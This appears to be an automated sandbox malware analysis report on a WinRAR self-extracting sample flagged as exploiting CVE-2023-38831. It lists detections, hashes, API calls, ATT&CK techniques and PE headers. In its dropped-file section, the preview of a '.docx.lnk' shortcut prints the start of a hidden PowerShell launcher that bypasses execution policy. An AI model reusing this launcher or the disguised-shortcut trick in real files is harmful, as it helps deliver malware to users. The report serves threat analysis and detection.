
Windows Analysis Report
HSZXPMB7kS.exe

Overview

General Information

Sample name:HSZXPMB7kS.exe
renamed because original name is a hash value
Original sample name:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd.exe
Analysis ID:1522688
MD5:d6f5ca5da79a7eb267670cc0e6f5d590
SHA1:6d62f339e2bb9b107b0309663d30e4e4647e4b5d
SHA256:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
Tags: exe, UAC-0099, user-JAMESWT_MHT

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
File is packed with WinRar
Found evasive API chain (date check)
Found potential string decryption / allocating functions
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious LNK Double Extension File Created
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HSZXPMB7kS.exe (PID: 2816 cmdline: "C:\Users\user\Desktop\HSZXPMB7kS.exe" MD5: D6F5CA5DA79A7EB267670CC0E6F5D590)
  • cleanup
No configs have been found
No yara matches
Source: File created. Author: Nasreddine Bencherchali (Nextron Systems), frack113. Data: EventID: 11, Image: C:\Users\user\Desktop\HSZXPMB7kS.exe, ProcessId: 2816, TargetFilename: C:\Users\user\Desktop\???i????-582-4453-08.docx.lnk
No Suricata rule has matched


AV Detection

Source: HSZXPMB7kS.exe Avira: detected
Source: HSZXPMB7kS.exe ReversingLabs: Detection: 63%
Source: HSZXPMB7kS.exe Virustotal: Detection: 65%
Source: HSZXPMB7kS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: HSZXPMB7kS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HSZXPMB7kS.exe
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0012BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0014C4F8 FindFirstFileExA
Source: unknown DNS traffic detected: query: 183.59.114.20.in-addr.arpa reply code: Name error (3)
Source: unknown DNS traffic detected: query: 15.164.165.52.in-addr.arpa reply code: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: 183.59.114.20.in-addr.arpa
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013B080 SetWindowLongW,NtdllDefWindowProc_W
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00127AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001292C6
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00137DCC
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00135001
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00138243
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00135272
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00146298
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001302F7
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001313F6
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013741E
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001464C7
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001355A0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0014E5F0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001307A0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0012D833
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013889F
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0012395A
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0014EA9E
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00124A8E
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00152BA4
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0012FCCC
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00122EB6
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: String function: 0013FEEC appears 42 times
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: String function: 0013FFC0 appears 56 times
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: String function: 00140790 appears 31 times
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: HSZXPMB7kS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal56.winEXE@1/1@2/0
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00127727 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013B0BE CLSIDFromString,CoCreateInstance
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013B6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5346625
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Command line argument: sfxname 1_2_0013F04C
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Command line argument: sfxstime 1_2_0013F04C
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Command line argument: STARTDLG 1_2_0013F04C
Source: HSZXPMB7kS.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: HSZXPMB7kS.exe ReversingLabs: Detection: 63%
Source: HSZXPMB7kS.exe Virustotal: Detection: 65%
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe File read: C:\Users\user\Desktop\HSZXPMB7kS.exe
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dataexchange.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: d3d11.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dcomp.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dxgi.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: msiso.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: mshtml.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: srpapi.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: msimtf.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: d2d1.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: dxcore.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: mlang.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: HSZXPMB7kS.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: HSZXPMB7kS.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HSZXPMB7kS.exe
Source: HSZXPMB7kS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HSZXPMB7kS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HSZXPMB7kS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HSZXPMB7kS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HSZXPMB7kS.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe File created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5346625
Source: HSZXPMB7kS.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001407E0 push ecx; ret 1_2_001407F3
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013FEEC push eax; ret 1_2_0013FF0A
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Memory allocated: 5B60000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_1-24311
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0012BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013D410 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0014C4F8 FindFirstFileExA
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013F81F VirtualQuery,GetSystemInfo
Source: HSZXPMB7kS.exe, 00000001.00000002.1565305433.0000000003089000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe API call chain: ExitProcess graph end node graph_1-24520
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001409FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001491A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0014D1E0 GetProcessHeap
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_001409FA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00140B8D SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00140D7A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00144FDF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_00140816 cpuid
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: GetLocaleInfoW,GetNumberFormatW 1_2_0013C083
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0013F04C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle
Source: C:\Users\user\Desktop\HSZXPMB7kS.exe Code function: 1_2_0012C365 GetVersionExW
MITRE ATT&CK matrix (rendered as a navigator layer in the original report; the full tactic-by-technique grid was flattened by extraction). Techniques highlighted with signature counts, by tactic:
  • Execution: Command and Scripting Interpreter (2), Native API (1)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: DLL Side-Loading (1)
  • Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1)
  • Discovery: System Time Discovery (1), Security Software Discovery (21), Virtualization/Sandbox Evasion (1), File and Directory Discovery (2), System Information Discovery (34)
  • Collection: Email Collection (1), Archive Collected Data (1)
  • Command and Control: Encrypted Channel (1), Non-Application Layer Protocol (1), Application Layer Protocol (1)
No techniques were highlighted under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Source | Detection | Scanner | Label
HSZXPMB7kS.exe | 63% | ReversingLabs | Win32.Exploit.CVE-2023-38831
HSZXPMB7kS.exe | 66% | Virustotal |
HSZXPMB7kS.exe | 100% | Avira | TR/Agent.xxqku
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
15.164.165.52.in-addr.arpa | unknown | unknown | false | | unknown
183.59.114.20.in-addr.arpa | unknown | unknown | false | | unknown
No contacted IP infos
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1522688
      Start date and time:2024-09-30 15:30:14 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 34s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of new started processes analysed:9
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:HSZXPMB7kS.exe
      renamed because original name is a hash value
      Original Sample Name:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd.exe
      Detection:MAL
      Classification:mal56.winEXE@1/1@2/0
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 99%
      • Number of executed functions: 120
      • Number of non-executed functions: 96
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      No simulations
      No context
      Process:C:\Users\user\Desktop\HSZXPMB7kS.exe
      File Type:MS Windows shortcut, Item id list present, Has Description string, Has command line arguments, Icon number=0, ctime=Fri Aug 4 04:10:09 2023, mtime=Fri Aug 4 04:10:09 2023, atime=Fri Aug 4 04:10:09 2023, length=0, window=hide
      Category:dropped
      Size (bytes):10562
      Entropy (8bit):6.046375755549102
      Encrypted:false
      SSDEEP:192:8iIJudXs1THeATd4shAXDDlL3Gvn2yDctJZ+7BJkY3820pLkz:oJ31rek44AX1L2vDDci3MRpL0
      MD5:4E37F3BBF59B456FB07DC71F3FC20DBA
      SHA1:816ADE8789655D00CC33D290A7D8F8C3321F80C0
      SHA-256:0ACD4A9EF18F3FD1CCF440879E768089D4DD2107E1CE19D2A17A59EBED8C7F5D
      SHA-512:646D1DCF0BA983CD179EB29B2CE4060DBE68E4A8D6B1CBB5F53ADCFCFBF796D6C76139C320D51B2C2B7764AD50498AEA5E911D467B3EB5149D7B7CAE39C718DD
      Malicious:false
      Reputation:low
      Preview:L..................Fe........Ng.....Ng.....Ng.................................P.O. .:i.....+00.../C:\.....................2..:..HG.%..windows\system32\WindowsPowershell\v1.0\powershell.exe.........HG.%.KMA....w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.s.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.e...F......'-w hidden -nop -noni -exec bypass -c $temp='
      File type:PE32 executable (GUI) Intel 80386, for MS Windows
      Entropy (8bit):6.754206235972524
      TrID:
      • Win32 Executable (generic) a (10002005/4) 99.96%
      • Generic Win/DOS Executable (2004/3) 0.02%
      • DOS Executable Generic (2002/1) 0.02%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
      File name:HSZXPMB7kS.exe
      File size:334'347 bytes
      MD5:d6f5ca5da79a7eb267670cc0e6f5d590
      SHA1:6d62f339e2bb9b107b0309663d30e4e4647e4b5d
      SHA256:2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
      SHA512:f0b1298f64aee6f683b5d985c1fcb8a5f2ac4d15a1e0a7c372f991c1a4e6b4152425506ad13cc11b04696ed9ff43e16d3419c2aced2dab4c2c80207834a2caa3
      SSDEEP:6144:ntH/xNLaAOvIBd7lAAxWS1elIoSN6WX+t45q3niV0:ntH5NLaAdDhAAEIFcWX+t4o3iV0
      TLSH:FA64C0027AC185B2D57328331A399F21A67D7C301F758EDB9394695EDE321C09B32BA7
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............w...w...w..<.V..w..<.T..w..<.U..w....Z..w.......w.......w.......w....$..w....4..w...w...v.......w.......w....X..w.......w.
      Icon Hash:1515d4d4442f2d2d
      Entrypoint:0x420780
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Time Stamp:0x6474CCD4 [Mon May 29 16:03:32 2023 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:5
      OS Version Minor:1
      File Version Major:5
      File Version Minor:1
      Subsystem Version Major:5
      Subsystem Version Minor:1
      Import Hash:0ae9e38912ff6bd742a1b9e5c003576a
      Instruction
      call 00007FBE219B916Bh
      jmp 00007FBE219B8B1Dh
      int3
      int3
      int3
      int3
      int3
      int3
      push 00423A80h
      push dword ptr fs:[00000000h]
      mov eax, dword ptr [esp+10h]
      mov dword ptr [esp+10h], ebp
      lea ebp, dword ptr [esp+10h]
      sub esp, eax
      push ebx
      push esi
      push edi
      mov eax, dword ptr [004407A8h]
      xor dword ptr [ebp-04h], eax
      xor eax, ebp
      push eax
      mov dword ptr [ebp-18h], esp
      push dword ptr [ebp-08h]
      mov eax, dword ptr [ebp-04h]
      mov dword ptr [ebp-04h], FFFFFFFEh
      mov dword ptr [ebp-08h], eax
      lea eax, dword ptr [ebp-10h]
      mov dword ptr fs:[00000000h], eax
      ret
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      int3
      mov ecx, dword ptr [ebp-10h]
      mov dword ptr fs:[00000000h], ecx
      pop ecx
      pop edi
      pop edi
      pop esi
      pop ebx
      mov esp, ebp
      pop ebp
      push ecx
      ret
      push ebp
      mov ebp, esp
      sub esp, 0Ch
      lea ecx, dword ptr [ebp-0Ch]
      call 00007FBE219AB9B1h
      push 0043D14Ch
      lea eax, dword ptr [ebp-0Ch]
      push eax
      call 00007FBE219BB7C5h
      int3
      jmp 00007FBE219BD698h
      push ebp
      mov ebp, esp
      and dword ptr [00463D58h], 00000000h
      sub esp, 24h
      or dword ptr [004407A0h], 01h
      push 0000000Ah
      call dword ptr [004341C4h]
      test eax, eax
      je 00007FBE219B8E52h
      and dword ptr [ebp-10h], 00000000h
      xor eax, eax
      push ebx
      push esi
      push edi
      xor ecx, ecx
      lea edi, dword ptr [ebp-24h]
      Programming Language:
      • [ C ] VS2008 SP1 build 30729
      • [IMP] VS2008 SP1 build 30729
      Name | Virtual Address | Virtual Size | Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3e380 | 0x34 | .rdata
      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e3b4 | 0x50 | .rdata
      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0xdff8 | .rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0x23dc | .reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3c1b0 | 0x54 | .rdata
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x366a8 | 0x40 | .rdata
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
      IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x278 | .rdata
